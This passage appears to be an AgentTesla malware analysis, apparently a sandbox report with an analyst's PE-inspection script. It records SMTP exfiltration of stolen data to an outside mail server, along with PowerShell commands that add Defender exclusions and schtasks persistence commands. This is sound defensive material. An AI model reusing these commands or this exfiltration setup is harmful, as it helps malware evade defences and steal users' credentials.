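def looks_like_clr_stub(info: dict) -> bool:
    """True when the entry point is the standard CLR thunk rather than native code."""
    return (info["jmp_target_directory"] == "IAT"
            and info["clr_header_present"]
            and info["single_import_slot"])


def code_section_is_high_entropy(info: dict) -> bool:
    """True when the section holding the entry point looks packed/encrypted."""
    return info["code_section_entropy"] is not None and info["code_section_entropy"] > HIGH_ENTROPY


if __name__ == "__main__":
    info = classify_entry_stub(ENTRY_POINT_RVA, JMP_TARGET_VA)
    for k, v in info.items():
        print(f"{k:>22}: {v:#x}" if isinstance(v, int) and not isinstance(v, bool) else f"{k:>22}: {v}")
    print("standard CLR entry stub:", looks_like_clr_stub(info))
    print("high-entropy code section:", code_section_is_high_entropy(info))
```

Run against the report's values this places the entry point at RVA 0xabe0e, three bytes past the end of the import directory inside .text, with the jmp reading the 4-byte IAT slot at RVA 0x2000 that the import table fills with the address of _CorExeMain. Once that is established there is nothing to gain from stepping the native entry point in a debugger; the analysis has to move to the CIL, which here lives in a .text section whose entropy is near the ceiling.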
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/17/24-04:38:01.123740 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49704 | 587 | 192.168.2.5 | 162.222.226.100
04/17/24-04:38:01.123740 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49704 | 587 | 192.168.2.5 | 162.222.226.100
04/17/24-04:38:01.123740 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49704 | 587 | 192.168.2.5 | 162.222.226.100
04/17/24-04:38:03.579390 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49705 | 587 | 192.168.2.5 | 162.222.226.100
04/17/24-04:38:03.579390 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49705 | 587 | 192.168.2.5 | 162.222.226.100
04/17/24-04:38:03.579390 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49705 | 587 | 192.168.2.5 | 162.222.226.100
04/17/24-04:38:03.579390 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49705 | 587 | 192.168.2.5 | 162.222.226.100
04/17/24-04:38:03.579390 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49705 | 587 | 192.168.2.5 | 162.222.226.100
04/17/24-04:38:01.123740 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49704 | 587 | 192.168.2.5 | 162.222.226.100
04/17/24-04:38:01.123740 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49704 | 587 | 192.168.2.5 | 162.222.226.100
04/17/24-04:38:01.123740 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49704 | 587 | 192.168.2.5 | 162.222.226.100
04/17/24-04:38:03.579390 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49705 | 587 | 192.168.2.5 | 162.222.226.100
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 17, 2024 04:37:59.144567966 CEST | 64400 | 53 | 192.168.2.5 | 1.1.1.1
Apr 17, 2024 04:37:59.367283106 CEST | 53 | 64400 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 17, 2024 04:37:59.144567966 CEST | 192.168.2.5 | 1.1.1.1 | 0x1caf | Standard query (0) | mail.thelamalab.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 17, 2024 04:37:59.367283106 CEST | 1.1.1.1 | 192.168.2.5 | 0x1caf | No error (0) | mail.thelamalab.com | | 162.222.226.100 | A (IP address) | IN (0x0001) | false
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Apr 17, 2024 04:37:59.939888000 CEST | 587 | 49704 | 162.222.226.100 | 192.168.2.5 | 220-md-114.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 17 Apr 2024 08:07:59 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 17, 2024 04:37:59.940562010 CEST | 49704 | 587 | 192.168.2.5 | 162.222.226.100 | EHLO 888683
Apr 17, 2024 04:38:00.101069927 CEST | 587 | 49704 | 162.222.226.100 | 192.168.2.5 | 250-md-114.webhostbox.net Hello 888683 [81.181.57.52]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Apr 17, 2024 04:38:00.101912022 CEST | 49704 | 587 | 192.168.2.5 | 162.222.226.100 | AUTH login YmlsbGluZ0B0aGVsYW1hbGFiLmNvbQ==
Apr 17, 2024 04:38:00.262630939 CEST | 587 | 49704 | 162.222.226.100 | 192.168.2.5 | 334 UGFzc3dvcmQ6
Apr 17, 2024 04:38:00.597055912 CEST | 587 | 49704 | 162.222.226.100 | 192.168.2.5 | 235 Authentication succeeded
Apr 17, 2024 04:38:00.597325087 CEST | 49704 | 587 | 192.168.2.5 | 162.222.226.100 | MAIL FROM:<billing@thelamalab.com>
Apr 17, 2024 04:38:00.757345915 CEST | 587 | 49704 | 162.222.226.100 | 192.168.2.5 | 250 OK
Apr 17, 2024 04:38:00.757498980 CEST | 49704 | 587 | 192.168.2.5 | 162.222.226.100 | RCPT TO:<jinhux31@gmail.com>
Apr 17, 2024 04:38:00.961685896 CEST | 587 | 49704 | 162.222.226.100 | 192.168.2.5 | 250 Accepted
Apr 17, 2024 04:38:00.961954117 CEST | 49704 | 587 | 192.168.2.5 | 162.222.226.100 | DATA
Apr 17, 2024 04:38:01.123025894 CEST | 587 | 49704 | 162.222.226.100 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
Apr 17, 2024 04:38:01.123740911 CEST | 49704 | 587 | 192.168.2.5 | 162.222.226.100 | .
Apr 17, 2024 04:38:01.285629988 CEST | 587 | 49704 | 162.222.226.100 | 192.168.2.5 | 250 OK id=1rwvBR-002odx-0A
Apr 17, 2024 04:38:02.562134027 CEST | 587 | 49705 | 162.222.226.100 | 192.168.2.5 | 220-md-114.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 17 Apr 2024 08:08:02 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 17, 2024 04:38:02.562906981 CEST | 49705 | 587 | 192.168.2.5 | 162.222.226.100 | EHLO 888683
Apr 17, 2024 04:38:02.723295927 CEST | 587 | 49705 | 162.222.226.100 | 192.168.2.5 | 250-md-114.webhostbox.net Hello 888683 [81.181.57.52]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Apr 17, 2024 04:38:02.723593950 CEST | 49705 | 587 | 192.168.2.5 | 162.222.226.100 | AUTH login YmlsbGluZ0B0aGVsYW1hbGFiLmNvbQ==
Apr 17, 2024 04:38:02.884491920 CEST | 587 | 49705 | 162.222.226.100 | 192.168.2.5 | 334 UGFzc3dvcmQ6
Apr 17, 2024 04:38:03.048023939 CEST | 587 | 49705 | 162.222.226.100 | 192.168.2.5 | 235 Authentication succeeded
Apr 17, 2024 04:38:03.049336910 CEST | 49705 | 587 | 192.168.2.5 | 162.222.226.100 | MAIL FROM:<billing@thelamalab.com>
Apr 17, 2024 04:38:03.210295916 CEST | 587 | 49705 | 162.222.226.100 | 192.168.2.5 | 250 OK
Apr 17, 2024 04:38:03.211163998 CEST | 49705 | 587 | 192.168.2.5 | 162.222.226.100 | RCPT TO:<jinhux31@gmail.com>
Apr 17, 2024 04:38:03.417901993 CEST | 587 | 49705 | 162.222.226.100 | 192.168.2.5 | 250 Accepted
Apr 17, 2024 04:38:03.418256044 CEST | 49705 | 587 | 192.168.2.5 | 162.222.226.100 | DATA
Apr 17, 2024 04:38:03.578695059 CEST | 587 | 49705 | 162.222.226.100 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
Apr 17, 2024 04:38:03.579587936 CEST | 49705 | 587 | 192.168.2.5 | 162.222.226.100 | .
Apr 17, 2024 04:38:03.741247892 CEST | 587 | 49705 | 162.222.226.100 | 192.168.2.5 | 250 OK id=1rwvBT-002okS-1d
Apr 17, 2024 04:39:39.165086031 CEST | 49704 | 587 | 192.168.2.5 | 162.222.226.100 | QUIT
Apr 17, 2024 04:39:39.527962923 CEST | 587 | 49704 | 162.222.226.100 | 192.168.2.5 | 221 md-114.webhostbox.net closing connection
Apr 17, 2024 04:39:42.121665001 CEST | 49705 | 587 | 192.168.2.5 | 162.222.226.100 | QUIT
Apr 17, 2024 04:39:42.484003067 CEST | 587 | 49705 | 162.222.226.100 | 192.168.2.5 | 221 md-114.webhostbox.net closing connection

                                            Target ID:0
                                            Start time:04:37:54
                                            Start date:17/04/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                                            Imagebase:0x740000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:04:37:55
                                            Start date:17/04/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                                            Imagebase:0x6d0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:04:37:55
                                            Start date:17/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:04:37:55
                                            Start date:17/04/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                                            Imagebase:0x6d0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:04:37:56
                                            Start date:17/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:04:37:56
                                            Start date:17/04/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp"
                                            Imagebase:0x360000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:04:37:56
                                            Start date:17/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:04:37:56
                                            Start date:17/04/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                                            Imagebase:0xc0000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:9
                                            Start time:04:37:56
                                            Start date:17/04/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                                            Imagebase:0xf30000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3258452239.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3258452239.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3258452239.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3258452239.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Target ID:10
                                            Start time:04:37:57
                                            Start date:17/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Imagebase:0x8b0000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 18%, ReversingLabs
                                             • Detection: 30%, Virustotal
                                            Reputation:low
                                            Has exited:true

                                            Target ID:11
                                            Start time:04:37:58
                                            Start date:17/04/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff6ef0c0000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:04:37:59
                                            Start date:17/04/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp"
                                            Imagebase:0x360000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:13
                                            Start time:04:37:59
                                            Start date:17/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:14
                                            Start time:04:37:59
                                            Start date:17/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                                            Imagebase:0x150000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:15
                                            Start time:04:37:59
                                            Start date:17/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                                            Imagebase:0x40000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:16
                                            Start time:04:38:00
                                            Start date:17/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                                            Imagebase:0x2e0000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:17
                                            Start time:04:38:00
                                            Start date:17/04/2024
                                            Path:C:\Users\user\AppData\Roaming\TuZRpLi.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                                            Imagebase:0x650000
                                            File size:702'976 bytes
                                            MD5 hash:78F627ADD2CCDD0F16400418E5F829B8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.3259301451.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.3259301451.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3259301451.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.3259301451.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                              Execution Graph

                                              Execution Coverage:11.1%
                                              Dynamic/Decrypted Code Coverage:99%
                                              Signature Coverage:0%
                                              Total number of Nodes:293
                                              Total number of Limit Nodes:9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c74c208a983941bad501409b8266ecfb503939c3201eaef36f2aa1df45ee81c
                                              • Instruction ID: 7c386bd32a35460f062a5e07d866cb8f121912461ad2e035305ef3c151991a9b
                                              • Opcode Fuzzy Hash: 7c74c208a983941bad501409b8266ecfb503939c3201eaef36f2aa1df45ee81c
                                              • Instruction Fuzzy Hash: FE42AC31B012049FDB14EB68C994BAEB7F6AF88300F14556AE506DB3E1DB74ED42CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 685 5d07806-5d078a5 688 5d078a7-5d078b1 685->688 689 5d078de-5d078fe 685->689 688->689 690 5d078b3-5d078b5 688->690 694 5d07900-5d0790a 689->694 695 5d07937-5d07966 689->695 692 5d078b7-5d078c1 690->692 693 5d078d8-5d078db 690->693 696 5d078c3 692->696 697 5d078c5-5d078d4 692->697 693->689 694->695 698 5d0790c-5d0790e 694->698 705 5d07968-5d07972 695->705 706 5d0799f-5d07a59 CreateProcessA 695->706 696->697 697->697 699 5d078d6 697->699 700 5d07910-5d0791a 698->700 701 5d07931-5d07934 698->701 699->693 703 5d0791c 700->703 704 5d0791e-5d0792d 700->704 701->695 703->704 704->704 707 5d0792f 704->707 705->706 708 5d07974-5d07976 705->708 717 5d07a62-5d07ae8 706->717 718 5d07a5b-5d07a61 706->718 707->701 710 5d07978-5d07982 708->710 711 5d07999-5d0799c 708->711 712 5d07984 710->712 713 5d07986-5d07995 710->713 711->706 712->713 713->713 714 5d07997 713->714 714->711 728 5d07af8-5d07afc 717->728 729 5d07aea-5d07aee 717->729 718->717 730 5d07b0c-5d07b10 728->730 731 5d07afe-5d07b02 728->731 729->728 732 5d07af0 729->732 734 5d07b20-5d07b24 730->734 735 5d07b12-5d07b16 730->735 731->730 733 5d07b04 731->733 732->728 733->730 737 5d07b36-5d07b3d 734->737 738 5d07b26-5d07b2c 734->738 735->734 736 5d07b18 735->736 736->734 739 5d07b54 737->739 740 5d07b3f-5d07b4e 737->740 738->737 741 5d07b55 739->741 740->739 741->741
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05D07A46
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 2ead44aa093ebee3171e41b8c351fbc2094243c804588aca513254160c1f1298
                                              • Instruction ID: 45aa12b7457600561233ec6bf54d0a451ffb7f811c1c6b314fec489612189d93
                                              • Opcode Fuzzy Hash: 2ead44aa093ebee3171e41b8c351fbc2094243c804588aca513254160c1f1298
                                              • Instruction Fuzzy Hash: 7CA13A71D00219DFDB20DF68C845BEDBBB2FF48314F1491AAE819AB290D774A985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 743 5d07810-5d078a5 745 5d078a7-5d078b1 743->745 746 5d078de-5d078fe 743->746 745->746 747 5d078b3-5d078b5 745->747 751 5d07900-5d0790a 746->751 752 5d07937-5d07966 746->752 749 5d078b7-5d078c1 747->749 750 5d078d8-5d078db 747->750 753 5d078c3 749->753 754 5d078c5-5d078d4 749->754 750->746 751->752 755 5d0790c-5d0790e 751->755 762 5d07968-5d07972 752->762 763 5d0799f-5d07a59 CreateProcessA 752->763 753->754 754->754 756 5d078d6 754->756 757 5d07910-5d0791a 755->757 758 5d07931-5d07934 755->758 756->750 760 5d0791c 757->760 761 5d0791e-5d0792d 757->761 758->752 760->761 761->761 764 5d0792f 761->764 762->763 765 5d07974-5d07976 762->765 774 5d07a62-5d07ae8 763->774 775 5d07a5b-5d07a61 763->775 764->758 767 5d07978-5d07982 765->767 768 5d07999-5d0799c 765->768 769 5d07984 767->769 770 5d07986-5d07995 767->770 768->763 769->770 770->770 771 5d07997 770->771 771->768 785 5d07af8-5d07afc 774->785 786 5d07aea-5d07aee 774->786 775->774 787 5d07b0c-5d07b10 785->787 788 5d07afe-5d07b02 785->788 786->785 789 5d07af0 786->789 791 5d07b20-5d07b24 787->791 792 5d07b12-5d07b16 787->792 788->787 790 5d07b04 788->790 789->785 790->787 794 5d07b36-5d07b3d 791->794 795 5d07b26-5d07b2c 791->795 792->791 793 5d07b18 792->793 793->791 796 5d07b54 794->796 797 5d07b3f-5d07b4e 794->797 795->794 798 5d07b55 796->798 797->796 798->798
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05D07A46
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 5e8567db94e164e66dd81b4ebb5eef484c15126e36d237fbc7946077a2441b92
                                              • Instruction ID: aa731378673c96ee2e430217b9629693e241d07850312edad56720c0d4051fde
                                              • Opcode Fuzzy Hash: 5e8567db94e164e66dd81b4ebb5eef484c15126e36d237fbc7946077a2441b92
                                              • Instruction Fuzzy Hash: 4B913A71D00219DFDB24DF68C845BADBBB2FF48314F1491AAD819AB280DB74A985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 800 5102590-510259f 801 51025a1-51025ae call 5101f34 800->801 802 51025cb-51025cf 800->802 807 51025b0 801->807 808 51025c4 801->808 804 51025d1-51025db 802->804 805 51025e3-5102624 802->805 804->805 811 5102631-510263f 805->811 812 5102626-510262e 805->812 857 51025b6 call 5102818 807->857 858 51025b6 call 5102828 807->858 808->802 813 5102641-5102646 811->813 814 5102663-5102665 811->814 812->811 816 5102651 813->816 817 5102648-510264f call 5101f40 813->817 819 5102668-510266f 814->819 815 51025bc-51025be 815->808 818 5102700-5102766 815->818 821 5102653-5102661 816->821 817->821 849 5102767-5102778 818->849 822 5102671-5102679 819->822 823 510267c-5102683 819->823 821->819 822->823 825 5102690-5102699 call 5101f50 823->825 826 5102685-510268d 823->826 831 51026a6-51026ab 825->831 832 510269b-51026a3 825->832 826->825 833 51026c9-51026cd 831->833 834 51026ad-51026b4 831->834 832->831 859 51026d0 call 5102b27 833->859 860 51026d0 call 5102b28 833->860 834->833 836 51026b6-51026c6 call 5101f60 call 5101f70 834->836 836->833 839 51026d3-51026d6 841 51026d8-51026f6 839->841 842 51026f9-51026ff 839->842 841->842 851 510277a-51027c0 849->851 852 51027c2-51027c5 851->852 853 51027c8-51027f3 GetModuleHandleW 851->853 852->853 854 51027f5-51027fb 853->854 855 51027fc-5102810 853->855 854->855 857->815 858->815 859->839 860->839
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 051027E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: f5b824ae729eda9a5f748c76b0e5380ddc79b3a94b7d6c99d4a35b6f80845a0c
                                              • Instruction ID: 44ef3c2bc4200fd61129563d6cb3579303a32b412ee2288c7ff4730ce6ca1665
                                              • Opcode Fuzzy Hash: f5b824ae729eda9a5f748c76b0e5380ddc79b3a94b7d6c99d4a35b6f80845a0c
                                              • Instruction Fuzzy Hash: 11814974A00B058FDB24DF29D548B6ABBF6FF48300F10892DD45AD7A90DB78E949CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 861 5108408-5108410 863 5108412-5108436 861->863 864 5108437-5109056 861->864 863->864 869 5109061-5109068 864->869 870 5109058-510905e 864->870 871 5109073-51090ab 869->871 872 510906a-5109070 869->872 870->869 874 51090b3-5109112 CreateWindowExW 871->874 872->871 875 5109114-510911a 874->875 876 510911b-5109153 874->876 875->876 880 5109160 876->880 881 5109155-5109158 876->881 882 5109161 880->882 881->880 882->882
                                              APIs
